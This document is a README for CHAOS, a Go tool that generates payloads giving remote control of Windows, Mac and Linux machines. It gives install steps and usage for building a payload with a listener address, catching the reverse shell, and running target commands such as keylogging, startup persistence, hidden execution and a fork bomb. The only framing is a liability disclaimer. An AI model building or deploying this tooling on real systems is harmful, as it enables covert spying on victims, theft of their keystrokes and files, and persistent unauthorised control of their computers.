CHAOS is a PoC that allows you to generate payloads and control remote operating systems.
Features
Feature | Windows | Mac | Linux |
---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | | |
Persistence | X | | |
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X | | |
How to Install
Install dependencies
$ sudo apt install golang git -y
Get this repository
$ go get github.com/tiagorlampert/CHAOS
Get external golang dependencies (all dependencies are required)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
You may see the message “package github.com/lxn/win: build constraints exclude all Go files”.
This occurs because the libraries are for Windows systems, but they are necessary to build the payload.
Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
Run
$ go run main.go
How to Use?
Command | On HOST does… |
---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify an IP for the connection |
lport= | Specify a port for the connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
Command | On TARGET does… |
---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the specified URL |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Disclaimer
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.